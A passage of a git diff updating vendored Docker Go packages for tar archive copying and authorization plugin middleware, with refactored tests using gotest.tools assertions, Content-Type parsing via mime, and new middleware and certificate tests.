This is an // error condition since you cannot create a directory from a file @@ -332,6 +337,9 @@ func RebaseArchiveEntries(srcContent io.Reader, oldBase, newBase string) io.Read } hdr.Name = strings.Replace(hdr.Name, oldBase, newBase, 1) + if hdr.Typeflag == tar.TypeLink { + hdr.Linkname = strings.Replace(hdr.Linkname, oldBase, newBase, 1) + } if err = rebasedTar.WriteHeader(hdr); err != nil { w.CloseWithError(err) @@ -348,6 +356,9 @@ func RebaseArchiveEntries(srcContent io.Reader, oldBase, newBase string) io.Read return rebased } +// TODO @gupta-ak. These might have to be changed in the future to be +// continuity driver aware as well to support LCOW. + // CopyResource performs an archive copy from the given source path to the // given destination path. The source path MUST exist and the destination // path's parent directory must exist. @@ -362,8 +373,8 @@ func CopyResource(srcPath, dstPath string, followLink bool) error { dstPath = normalizePath(dstPath) // Clean the source and destination paths. - srcPath = PreserveTrailingDotOrSeparator(filepath.Clean(srcPath), srcPath) - dstPath = PreserveTrailingDotOrSeparator(filepath.Clean(dstPath), dstPath) + srcPath = PreserveTrailingDotOrSeparator(filepath.Clean(srcPath), srcPath, os.PathSeparator) + dstPath = PreserveTrailingDotOrSeparator(filepath.Clean(dstPath), dstPath, os.PathSeparator) if srcInfo, err = CopyInfoSourcePath(srcPath, followLink); err != nil { return err @@ -426,7 +437,8 @@ func ResolveHostSourcePath(path string, followLink bool) (resolvedPath, rebaseNa // resolvedDirPath will have been cleaned (no trailing path separators) so // we can manually join it with the base path element. 
resolvedPath = resolvedDirPath + string(filepath.Separator) + basePath - if hasTrailingPathSeparator(path) && filepath.Base(path) != filepath.Base(resolvedPath) { + if hasTrailingPathSeparator(path, os.PathSeparator) && + filepath.Base(path) != filepath.Base(resolvedPath) { rebaseName = filepath.Base(path) } } @@ -439,11 +451,13 @@ func GetRebaseName(path, resolvedPath string) (string, string) { // linkTarget will have been cleaned (no trailing path separators and dot) so // we can manually join it with them var rebaseName string - if specifiesCurrentDir(path) && !specifiesCurrentDir(resolvedPath) { + if specifiesCurrentDir(path) && + !specifiesCurrentDir(resolvedPath) { resolvedPath += string(filepath.Separator) + "." } - if hasTrailingPathSeparator(path) && !hasTrailingPathSeparator(resolvedPath) { + if hasTrailingPathSeparator(path, os.PathSeparator) && + !hasTrailingPathSeparator(resolvedPath, os.PathSeparator) { resolvedPath += string(filepath.Separator) } diff --git a/vendor/github.com/docker/docker/pkg/archive/copy_unix.go b/vendor/github.com/docker/docker/pkg/archive/copy_unix.go index e305b5e4af..3958364f5b 100644 --- a/vendor/github.com/docker/docker/pkg/archive/copy_unix.go +++ b/vendor/github.com/docker/docker/pkg/archive/copy_unix.go @@ -1,6 +1,6 @@ // +build !windows -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "path/filepath" diff --git a/vendor/github.com/docker/docker/pkg/archive/copy_unix_test.go b/vendor/github.com/docker/docker/pkg/archive/copy_unix_test.go index ecbfc172b0..739ad0e3ef 100644 --- a/vendor/github.com/docker/docker/pkg/archive/copy_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/archive/copy_unix_test.go @@ -1,8 +1,8 @@ // +build !windows -// TODO Windows: Some of these tests may be salvagable and portable to Windows. +// TODO Windows: Some of these tests may be salvageable and portable to Windows. 
-package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "bytes" @@ -15,6 +15,8 @@ import ( "path/filepath" "strings" "testing" + + "gotest.tools/assert" ) func removeAllPaths(paths ...string) { @@ -26,13 +28,11 @@ func removeAllPaths(paths ...string) { func getTestTempDirs(t *testing.T) (tmpDirA, tmpDirB string) { var err error - if tmpDirA, err = ioutil.TempDir("", "archive-copy-test"); err != nil { - t.Fatal(err) - } + tmpDirA, err = ioutil.TempDir("", "archive-copy-test") + assert.NilError(t, err) - if tmpDirB, err = ioutil.TempDir("", "archive-copy-test"); err != nil { - t.Fatal(err) - } + tmpDirB, err = ioutil.TempDir("", "archive-copy-test") + assert.NilError(t, err) return } @@ -118,9 +118,8 @@ func logDirContents(t *testing.T, dirPath string) { t.Logf("logging directory contents: %q", dirPath) - if err := filepath.Walk(dirPath, logWalkedPaths); err != nil { - t.Fatal(err) - } + err := filepath.Walk(dirPath, logWalkedPaths) + assert.NilError(t, err) } func testCopyHelper(t *testing.T, srcPath, dstPath string) (err error) { @@ -293,9 +292,8 @@ func TestCopyCaseA(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = fileContentsEqual(t, srcPath, dstPath); err != nil { - t.Fatal(err) - } + err = fileContentsEqual(t, srcPath, dstPath) + assert.NilError(t, err) os.Remove(dstPath) symlinkPath := filepath.Join(tmpDirA, "symlink3") @@ -306,17 +304,15 @@ func TestCopyCaseA(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = fileContentsEqual(t, linkTarget, dstPath); err != nil { - t.Fatal(err) - } + err = fileContentsEqual(t, linkTarget, dstPath) + assert.NilError(t, err) os.Remove(dstPath) if err = testCopyHelperFSym(t, symlinkPath1, dstPath); err != nil { t.Fatalf("unexpected error %T: %s", err, err) } - if err = fileContentsEqual(t, linkTarget, dstPath); err != nil { - t.Fatal(err) - } + err = fileContentsEqual(t, linkTarget, dstPath) + assert.NilError(t, err) } // B. 
SRC specifies a file and DST (with trailing path separator) doesn't @@ -377,9 +373,8 @@ func TestCopyCaseC(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = fileContentsEqual(t, srcPath, dstPath); err != nil { - t.Fatal(err) - } + err = fileContentsEqual(t, srcPath, dstPath) + assert.NilError(t, err) } // C. Symbol link following version: @@ -415,9 +410,8 @@ func TestCopyCaseCFSym(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = fileContentsEqual(t, linkTarget, dstPath); err != nil { - t.Fatal(err) - } + err = fileContentsEqual(t, linkTarget, dstPath) + assert.NilError(t, err) } // D. SRC specifies a file and DST exists as a directory. This should place @@ -446,9 +440,8 @@ func TestCopyCaseD(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = fileContentsEqual(t, srcPath, dstPath); err != nil { - t.Fatal(err) - } + err = fileContentsEqual(t, srcPath, dstPath) + assert.NilError(t, err) // Now try again but using a trailing path separator for dstDir. @@ -466,9 +459,8 @@ func TestCopyCaseD(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = fileContentsEqual(t, srcPath, dstPath); err != nil { - t.Fatal(err) - } + err = fileContentsEqual(t, srcPath, dstPath) + assert.NilError(t, err) } // D. Symbol link following version: @@ -499,9 +491,8 @@ func TestCopyCaseDFSym(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = fileContentsEqual(t, linkTarget, dstPath); err != nil { - t.Fatal(err) - } + err = fileContentsEqual(t, linkTarget, dstPath) + assert.NilError(t, err) // Now try again but using a trailing path separator for dstDir. @@ -519,9 +510,8 @@ func TestCopyCaseDFSym(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = fileContentsEqual(t, linkTarget, dstPath); err != nil { - t.Fatal(err) - } + err = fileContentsEqual(t, linkTarget, dstPath) + assert.NilError(t, err) } // E. SRC specifies a directory and DST does not exist. 
This should create a @@ -563,9 +553,8 @@ func TestCopyCaseE(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = dirContentsEqual(t, dstDir, srcDir); err != nil { - t.Fatal(err) - } + err = dirContentsEqual(t, dstDir, srcDir) + assert.NilError(t, err) } // E. Symbol link following version: @@ -609,9 +598,8 @@ func TestCopyCaseEFSym(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = dirContentsEqual(t, dstDir, linkTarget); err != nil { - t.Fatal(err) - } + err = dirContentsEqual(t, dstDir, linkTarget) + assert.NilError(t, err) } // F. SRC specifies a directory and DST exists as a file. This should cause an @@ -669,9 +657,8 @@ func TestCopyCaseG(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = dirContentsEqual(t, resultDir, srcDir); err != nil { - t.Fatal(err) - } + err = dirContentsEqual(t, resultDir, srcDir) + assert.NilError(t, err) // Now try again but using a trailing path separator for dstDir. @@ -689,9 +676,8 @@ func TestCopyCaseG(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = dirContentsEqual(t, resultDir, srcDir); err != nil { - t.Fatal(err) - } + err = dirContentsEqual(t, resultDir, srcDir) + assert.NilError(t, err) } // G. Symbol link version: @@ -717,9 +703,8 @@ func TestCopyCaseGFSym(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = dirContentsEqual(t, resultDir, linkTarget); err != nil { - t.Fatal(err) - } + err = dirContentsEqual(t, resultDir, linkTarget) + assert.NilError(t, err) // Now try again but using a trailing path separator for dstDir. @@ -737,9 +722,8 @@ func TestCopyCaseGFSym(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = dirContentsEqual(t, resultDir, linkTarget); err != nil { - t.Fatal(err) - } + err = dirContentsEqual(t, resultDir, linkTarget) + assert.NilError(t, err) } // H. SRC specifies a directory's contents only and DST does not exist. 
This @@ -899,9 +883,8 @@ func TestCopyCaseJ(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = dirContentsEqual(t, dstDir, srcDir); err != nil { - t.Fatal(err) - } + err = dirContentsEqual(t, dstDir, srcDir) + assert.NilError(t, err) // Now try again but using a trailing path separator for dstDir. @@ -919,9 +902,8 @@ func TestCopyCaseJ(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = dirContentsEqual(t, dstDir, srcDir); err != nil { - t.Fatal(err) - } + err = dirContentsEqual(t, dstDir, srcDir) + assert.NilError(t, err) } // J. Symbol link following version: @@ -952,9 +934,8 @@ func TestCopyCaseJFSym(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = dirContentsEqual(t, dstDir, linkTarget); err != nil { - t.Fatal(err) - } + err = dirContentsEqual(t, dstDir, linkTarget) + assert.NilError(t, err) // Now try again but using a trailing path separator for dstDir. @@ -972,7 +953,6 @@ func TestCopyCaseJFSym(t *testing.T) { t.Fatalf("unexpected error %T: %s", err, err) } - if err = dirContentsEqual(t, dstDir, linkTarget); err != nil { - t.Fatal(err) - } + err = dirContentsEqual(t, dstDir, linkTarget) + assert.NilError(t, err) } diff --git a/vendor/github.com/docker/docker/pkg/archive/copy_windows.go b/vendor/github.com/docker/docker/pkg/archive/copy_windows.go index 2b775b45c4..a878d1bac4 100644 --- a/vendor/github.com/docker/docker/pkg/archive/copy_windows.go +++ b/vendor/github.com/docker/docker/pkg/archive/copy_windows.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "path/filepath" diff --git a/vendor/github.com/docker/docker/pkg/archive/diff.go b/vendor/github.com/docker/docker/pkg/archive/diff.go index 9e1a58c499..fae4b9de02 100644 --- a/vendor/github.com/docker/docker/pkg/archive/diff.go +++ b/vendor/github.com/docker/docker/pkg/archive/diff.go @@ -1,4 +1,4 @@ -package archive +package archive // import 
"github.com/docker/docker/pkg/archive" import ( "archive/tar" @@ -10,10 +10,10 @@ import ( "runtime" "strings" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/pools" "github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" ) // UnpackLayer unpack `layer` to a `dest`. The stream `layer` can be @@ -33,17 +33,11 @@ func UnpackLayer(dest string, layer io.Reader, options *TarOptions) (size int64, if options.ExcludePatterns == nil { options.ExcludePatterns = []string{} } - remappedRootUID, remappedRootGID, err := idtools.GetRootUIDGID(options.UIDMaps, options.GIDMaps) - if err != nil { - return 0, err - } + idMappings := idtools.NewIDMappingsFromMaps(options.UIDMaps, options.GIDMaps) aufsTempdir := "" aufsHardlinks := make(map[string]*tar.Header) - if options == nil { - options = &TarOptions{} - } // Iterate through the files in the archive. for { hdr, err := tr.Next() @@ -90,7 +84,7 @@ func UnpackLayer(dest string, layer io.Reader, options *TarOptions) (size int64, parentPath := filepath.Join(dest, parent) if _, err := os.Lstat(parentPath); err != nil && os.IsNotExist(err) { - err = system.MkdirAll(parentPath, 0600) + err = system.MkdirAll(parentPath, 0600, "") if err != nil { return 0, err } @@ -198,27 +192,10 @@ func UnpackLayer(dest string, layer io.Reader, options *TarOptions) (size int64, srcData = tmpFile } - // if the options contain a uid & gid maps, convert header uid/gid - // entries using the maps such that lchown sets the proper mapped - // uid/gid after writing the file. We only perform this mapping if - // the file isn't already owned by the remapped root UID or GID, as - // that specific uid/gid has no mapping from container -> host, and - // those files already have the proper ownership for inside the - // container. 
- if srcHdr.Uid != remappedRootUID { - xUID, err := idtools.ToHost(srcHdr.Uid, options.UIDMaps) - if err != nil { - return 0, err - } - srcHdr.Uid = xUID - } - if srcHdr.Gid != remappedRootGID { - xGID, err := idtools.ToHost(srcHdr.Gid, options.GIDMaps) - if err != nil { - return 0, err - } - srcHdr.Gid = xGID + if err := remapIDs(idMappings, srcHdr); err != nil { + return 0, err } + if err := createTarFile(path, dest, srcHdr, srcData, true, nil, options.InUserNS); err != nil { return 0, err } @@ -270,10 +247,12 @@ func applyLayerHandler(dest string, layer io.Reader, options *TarOptions, decomp defer system.Umask(oldmask) // ignore err, ErrNotSupportedPlatform if decompress { - layer, err = DecompressStream(layer) + decompLayer, err := DecompressStream(layer) if err != nil { return 0, err } + defer decompLayer.Close() + layer = decompLayer } return UnpackLayer(dest, layer, options) } diff --git a/vendor/github.com/docker/docker/pkg/archive/diff_test.go b/vendor/github.com/docker/docker/pkg/archive/diff_test.go index 8167941ac0..19f2555e1a 100644 --- a/vendor/github.com/docker/docker/pkg/archive/diff_test.go +++ b/vendor/github.com/docker/docker/pkg/archive/diff_test.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" diff --git a/vendor/github.com/docker/docker/pkg/archive/example_changes.go b/vendor/github.com/docker/docker/pkg/archive/example_changes.go index cedd46a408..495db809e9 100644 --- a/vendor/github.com/docker/docker/pkg/archive/example_changes.go +++ b/vendor/github.com/docker/docker/pkg/archive/example_changes.go @@ -13,8 +13,8 @@ import ( "os" "path" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/archive" + "github.com/sirupsen/logrus" ) var ( diff --git a/vendor/github.com/docker/docker/pkg/archive/time_linux.go b/vendor/github.com/docker/docker/pkg/archive/time_linux.go index 3448569b1e..797143ee84 100644 --- 
a/vendor/github.com/docker/docker/pkg/archive/time_linux.go +++ b/vendor/github.com/docker/docker/pkg/archive/time_linux.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "syscall" @@ -9,7 +9,7 @@ func timeToTimespec(time time.Time) (ts syscall.Timespec) { if time.IsZero() { // Return UTIME_OMIT special value ts.Sec = 0 - ts.Nsec = ((1 << 30) - 2) + ts.Nsec = (1 << 30) - 2 return } return syscall.NsecToTimespec(time.UnixNano()) diff --git a/vendor/github.com/docker/docker/pkg/archive/time_unsupported.go b/vendor/github.com/docker/docker/pkg/archive/time_unsupported.go index e85aac0540..f58bf227fd 100644 --- a/vendor/github.com/docker/docker/pkg/archive/time_unsupported.go +++ b/vendor/github.com/docker/docker/pkg/archive/time_unsupported.go @@ -1,6 +1,6 @@ // +build !linux -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "syscall" diff --git a/vendor/github.com/docker/docker/pkg/archive/utils_test.go b/vendor/github.com/docker/docker/pkg/archive/utils_test.go index 01b9e92d1c..a20f58ddab 100644 --- a/vendor/github.com/docker/docker/pkg/archive/utils_test.go +++ b/vendor/github.com/docker/docker/pkg/archive/utils_test.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" diff --git a/vendor/github.com/docker/docker/pkg/archive/whiteouts.go b/vendor/github.com/docker/docker/pkg/archive/whiteouts.go index d20478a10d..4c072a87ee 100644 --- a/vendor/github.com/docker/docker/pkg/archive/whiteouts.go +++ b/vendor/github.com/docker/docker/pkg/archive/whiteouts.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" // Whiteouts are files with a special meaning for the layered filesystem. // Docker uses AUFS whiteout files inside exported archives. 
In other diff --git a/vendor/github.com/docker/docker/pkg/archive/wrap.go b/vendor/github.com/docker/docker/pkg/archive/wrap.go index b39d12c878..85435694cf 100644 --- a/vendor/github.com/docker/docker/pkg/archive/wrap.go +++ b/vendor/github.com/docker/docker/pkg/archive/wrap.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" diff --git a/vendor/github.com/docker/docker/pkg/archive/wrap_test.go b/vendor/github.com/docker/docker/pkg/archive/wrap_test.go index 46ab36697a..1faa7aed75 100644 --- a/vendor/github.com/docker/docker/pkg/archive/wrap_test.go +++ b/vendor/github.com/docker/docker/pkg/archive/wrap_test.go @@ -1,17 +1,17 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" "bytes" "io" "testing" + + "gotest.tools/assert" ) func TestGenerateEmptyFile(t *testing.T) { archive, err := Generate("emptyFile") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) if archive == nil { t.Fatal("The generated archive should not be nil.") } @@ -28,9 +28,7 @@ func TestGenerateEmptyFile(t *testing.T) { if err == io.EOF { break } - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) buf := new(bytes.Buffer) buf.ReadFrom(tr) content := buf.String() @@ -54,9 +52,7 @@ func TestGenerateEmptyFile(t *testing.T) { func TestGenerateWithContent(t *testing.T) { archive, err := Generate("file", "content") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) if archive == nil { t.Fatal("The generated archive should not be nil.") } @@ -73,9 +69,7 @@ func TestGenerateWithContent(t *testing.T) { if err == io.EOF { break } - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) buf := new(bytes.Buffer) buf.ReadFrom(tr) content := buf.String() diff --git a/vendor/github.com/docker/docker/pkg/authorization/api.go b/vendor/github.com/docker/docker/pkg/authorization/api.go index 05c75f1a67..cc0c12d502 100644 --- 
a/vendor/github.com/docker/docker/pkg/authorization/api.go +++ b/vendor/github.com/docker/docker/pkg/authorization/api.go @@ -1,4 +1,4 @@ -package authorization +package authorization // import "github.com/docker/docker/pkg/authorization" import ( "crypto/x509" @@ -18,7 +18,7 @@ const ( ) // PeerCertificate is a wrapper around x509.Certificate which provides a sane -// enconding/decoding to/from PEM format and JSON. +// encoding/decoding to/from PEM format and JSON. type PeerCertificate x509.Certificate // MarshalJSON returns the JSON encoded pem bytes of a PeerCertificate. diff --git a/vendor/github.com/docker/docker/pkg/authorization/api_test.go b/vendor/github.com/docker/docker/pkg/authorization/api_test.go new file mode 100644 index 0000000000..ff364fd0bc --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/authorization/api_test.go @@ -0,0 +1,76 @@ +package authorization // import "github.com/docker/docker/pkg/authorization" + +import ( + "crypto/rand" + "crypto/rsa" + "crypto/tls" + "crypto/x509" + "crypto/x509/pkix" + "math/big" + "net/http" + "testing" + "time" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestPeerCertificateMarshalJSON(t *testing.T) { + template := &x509.Certificate{ + IsCA: true, + BasicConstraintsValid: true, + SubjectKeyId: []byte{1, 2, 3}, + SerialNumber: big.NewInt(1234), + Subject: pkix.Name{ + Country: []string{"Earth"}, + Organization: []string{"Mother Nature"}, + }, + NotBefore: time.Now(), + NotAfter: time.Now().AddDate(5, 5, 5), + + ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth, x509.ExtKeyUsageServerAuth}, + KeyUsage: x509.KeyUsageDigitalSignature | x509.KeyUsageCertSign, + } + // generate private key + privatekey, err := rsa.GenerateKey(rand.Reader, 2048) + assert.NilError(t, err) + publickey := &privatekey.PublicKey + + // create a self-signed certificate. 
template = parent + var parent = template + raw, err := x509.CreateCertificate(rand.Reader, template, parent, publickey, privatekey) + assert.NilError(t, err) + + cert, err := x509.ParseCertificate(raw) + assert.NilError(t, err) + + var certs = []*x509.Certificate{cert} + addr := "www.authz.com/auth" + req, err := http.NewRequest("GET", addr, nil) + assert.NilError(t, err) + + req.RequestURI = addr + req.TLS = &tls.ConnectionState{} + req.TLS.PeerCertificates = certs + req.Header.Add("header", "value") + + for _, c := range req.TLS.PeerCertificates { + pcObj := PeerCertificate(*c) + + t.Run("Marshalling :", func(t *testing.T) { + raw, err = pcObj.MarshalJSON() + assert.Assert(t, raw != nil) + assert.NilError(t, err) + }) + + t.Run("UnMarshalling :", func(t *testing.T) { + err := pcObj.UnmarshalJSON(raw) + assert.Assert(t, is.Nil(err)) + assert.Equal(t, "Earth", pcObj.Subject.Country[0]) + assert.Equal(t, true, pcObj.IsCA) + + }) + + } + +} diff --git a/vendor/github.com/docker/docker/pkg/authorization/authz.go b/vendor/github.com/docker/docker/pkg/authorization/authz.go index dc9a9ae56f..a1edbcd89d 100644 --- a/vendor/github.com/docker/docker/pkg/authorization/authz.go +++ b/vendor/github.com/docker/docker/pkg/authorization/authz.go @@ -1,15 +1,16 @@ -package authorization +package authorization // import "github.com/docker/docker/pkg/authorization" import ( "bufio" "bytes" "fmt" "io" + "mime" "net/http" "strings" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/ioutils" + "github.com/sirupsen/logrus" ) const maxBodySize = 1048576 // 1MB @@ -153,12 +154,17 @@ func sendBody(url string, header http.Header) bool { } // body is sent only for text or json messages - return header.Get("Content-Type") == "application/json" + contentType, _, err := mime.ParseMediaType(header.Get("Content-Type")) + if err != nil { + return false + } + + return contentType == "application/json" } // headers returns flatten version of the http headers excluding authorization func 
headers(header http.Header) map[string]string { - v := make(map[string]string, 0) + v := make(map[string]string) for k, values := range header { // Skip authorization headers if strings.EqualFold(k, "Authorization") || strings.EqualFold(k, "X-Registry-Config") || strings.EqualFold(k, "X-Registry-Auth") { @@ -176,10 +182,7 @@ type authorizationError struct { error } -// HTTPErrorStatusCode returns the authorization error status code (forbidden) -func (e authorizationError) HTTPErrorStatusCode() int { - return http.StatusForbidden -} +func (authorizationError) Forbidden() {} func newAuthorizationError(plugin, msg string) authorizationError { return authorizationError{error: fmt.Errorf("authorization denied by plugin %s: %s", plugin, msg)} diff --git a/vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go b/vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go index a787f3cd8c..cfdb9a0039 100644 --- a/vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go @@ -3,7 +3,7 @@ // TODO Windows: This uses a Unix socket for testing. This might be possible // to port to Windows using a named pipe instead. 
-package authorization +package authorization // import "github.com/docker/docker/pkg/authorization" import ( "bytes" @@ -99,7 +99,7 @@ func TestAuthZResponsePlugin(t *testing.T) { request := Request{ User: "user", - RequestURI: "someting.com/auth", + RequestURI: "something.com/auth", RequestBody: []byte("sample body"), } server.replayResponse = Response{ @@ -172,6 +172,66 @@ func TestDrainBody(t *testing.T) { } } +func TestSendBody(t *testing.T) { + var ( + url = "nothing.com" + testcases = []struct { + contentType string + expected bool + }{ + { + contentType: "application/json", + expected: true, + }, + { + contentType: "Application/json", + expected: true, + }, + { + contentType: "application/JSON", + expected: true, + }, + { + contentType: "APPLICATION/JSON", + expected: true, + }, + { + contentType: "application/json; charset=utf-8", + expected: true, + }, + { + contentType: "application/json;charset=utf-8", + expected: true, + }, + { + contentType: "application/json; charset=UTF8", + expected: true, + }, + { + contentType: "application/json;charset=UTF8", + expected: true, + }, + { + contentType: "text/html", + expected: false, + }, + { + contentType: "", + expected: false, + }, + } + ) + + for _, testcase := range testcases { + header := http.Header{} + header.Set("Content-Type", testcase.contentType) + + if b := sendBody(url, header); b != testcase.expected { + t.Fatalf("Unexpected Content-Type; Expected: %t, Actual: %t", testcase.expected, b) + } + } +} + func TestResponseModifierOverride(t *testing.T) { r := httptest.NewRecorder() m := NewResponseModifier(r) diff --git a/vendor/github.com/docker/docker/pkg/authorization/middleware.go b/vendor/github.com/docker/docker/pkg/authorization/middleware.go index 52890dd360..39c2dce856 100644 --- a/vendor/github.com/docker/docker/pkg/authorization/middleware.go +++ b/vendor/github.com/docker/docker/pkg/authorization/middleware.go @@ -1,12 +1,12 @@ -package authorization +package authorization // import 
"github.com/docker/docker/pkg/authorization" import ( + "context" "net/http" "sync" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/plugingetter" - "golang.org/x/net/context" + "github.com/sirupsen/logrus" ) // Middleware uses a list of plugins to @@ -25,6 +25,12 @@ func NewMiddleware(names []string, pg plugingetter.PluginGetter) *Middleware { } } +func (m *Middleware) getAuthzPlugins() []Plugin { + m.mu.Lock() + defer m.mu.Unlock() + return m.plugins +} + // SetPlugins sets the plugin used for authorization func (m *Middleware) SetPlugins(names []string) { m.mu.Lock() @@ -32,13 +38,23 @@ func (m *Middleware) SetPlugins(names []string) { m.mu.Unlock() } +// RemovePlugin removes a single plugin from this authz middleware chain +func (m *Middleware) RemovePlugin(name string) { + m.mu.Lock() + defer m.mu.Unlock() + plugins := m.plugins[:0] + for _, authPlugin := range m.plugins { + if authPlugin.Name() != name { + plugins = append(plugins, authPlugin) + } + } + m.plugins = plugins +} + // WrapHandler returns a new handler function wrapping the previous one in the request chain. func (m *Middleware) WrapHandler(handler func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { - - m.mu.Lock() - plugins := m.plugins - m.mu.Unlock() + plugins := m.getAuthzPlugins() if len(plugins) == 0 { return handler(ctx, w, r, vars) } @@ -70,6 +86,16 @@ func (m *Middleware) WrapHandler(handler func(ctx context.Context, w http.Respon logrus.Errorf("Handler for %s %s returned error: %s", r.Method, r.RequestURI, errD) } + // There's a chance that the authCtx.plugins was updated. One of the reasons + // this can happen is when an authzplugin is disabled. 
+ plugins = m.getAuthzPlugins() + if len(plugins) == 0 { + logrus.Debug("There are no authz plugins in the chain") + return nil + } + + authCtx.plugins = plugins + if err := authCtx.AuthZResponse(rw, r); errD == nil && err != nil { logrus.Errorf("AuthZResponse for %s %s returned error: %s", r.Method, r.RequestURI, err) return err diff --git a/vendor/github.com/docker/docker/pkg/authorization/middleware_test.go b/vendor/github.com/docker/docker/pkg/authorization/middleware_test.go new file mode 100644 index 0000000000..6afafe082d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/authorization/middleware_test.go @@ -0,0 +1,53 @@ +package authorization // import "github.com/docker/docker/pkg/authorization" + +import ( + "net/http" + "net/http/httptest" + "strings" + "testing" + + "github.com/docker/docker/pkg/plugingetter" + "gotest.tools/assert" +) + +func TestMiddleware(t *testing.T) { + pluginNames := []string{"testPlugin1", "testPlugin2"} + var pluginGetter plugingetter.PluginGetter + m := NewMiddleware(pluginNames, pluginGetter) + authPlugins := m.getAuthzPlugins() + assert.Equal(t, 2, len(authPlugins)) + assert.Equal(t, pluginNames[0], authPlugins[0].Name()) + assert.Equal(t, pluginNames[1], authPlugins[1].Name()) +} + +func TestNewResponseModifier(t *testing.T) { + recorder := httptest.NewRecorder() + modifier := NewResponseModifier(recorder) + modifier.Header().Set("H1", "V1") + modifier.Write([]byte("body")) + assert.Assert(t, !modifier.Hijacked()) + modifier.WriteHeader(http.StatusInternalServerError) + assert.Assert(t, modifier.RawBody() != nil) + + raw, err := modifier.RawHeaders() + assert.Assert(t, raw != nil) + assert.NilError(t, err) + + headerData := strings.Split(strings.TrimSpace(string(raw)), ":") + assert.Equal(t, "H1", strings.TrimSpace(headerData[0])) + assert.Equal(t, "V1", strings.TrimSpace(headerData[1])) + + modifier.Flush() + modifier.FlushAll() + + if recorder.Header().Get("H1") != "V1" { + t.Fatalf("Header value must exists %s", 
recorder.Header().Get("H1")) + } + +} + +func setAuthzPlugins(m *Middleware, plugins []Plugin) { + m.mu.Lock() + m.plugins = plugins + m.mu.Unlock() +} diff --git a/vendor/github.com/docker/docker/pkg/authorization/middleware_unix_test.go b/vendor/github.com/docker/docker/pkg/authorization/middleware_unix_test.go new file mode 100644 index 0000000000..450e7fbbb7 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/authorization/middleware_unix_test.go @@ -0,0 +1,66 @@ +// +build !windows + +package authorization // import "github.com/docker/docker/pkg/authorization" + +import ( + "context" + "net/http" + "net/http/httptest" + "testing" + + "github.com/docker/docker/pkg/plugingetter" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestMiddlewareWrapHandler(t *testing.T) { + server := authZPluginTestServer{t: t} + server.start() + defer server.stop() + + authZPlugin := createTestPlugin(t) + pluginNames := []string{authZPlugin.name} + + var pluginGetter plugingetter.PluginGetter + middleWare := NewMiddleware(pluginNames, pluginGetter) + handler := func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + return nil + } + + authList := []Plugin{authZPlugin} + middleWare.SetPlugins([]string{"My Test Plugin"}) + setAuthzPlugins(middleWare, authList) + mdHandler := middleWare.WrapHandler(handler) + assert.Assert(t, mdHandler != nil) + + addr := "www.example.com/auth" + req, _ := http.NewRequest("GET", addr, nil) + req.RequestURI = addr + req.Header.Add("header", "value") + + resp := httptest.NewRecorder() + ctx := context.Background() + + t.Run("Error Test Case :", func(t *testing.T) { + server.replayResponse = Response{ + Allow: false, + Msg: "Server Auth Not Allowed", + } + if err := mdHandler(ctx, resp, req, map[string]string{}); err == nil { + assert.Assert(t, is.ErrorContains(err, "")) + } + + }) + + t.Run("Positive Test Case :", func(t *testing.T) { + server.replayResponse = Response{ + Allow: true, + 
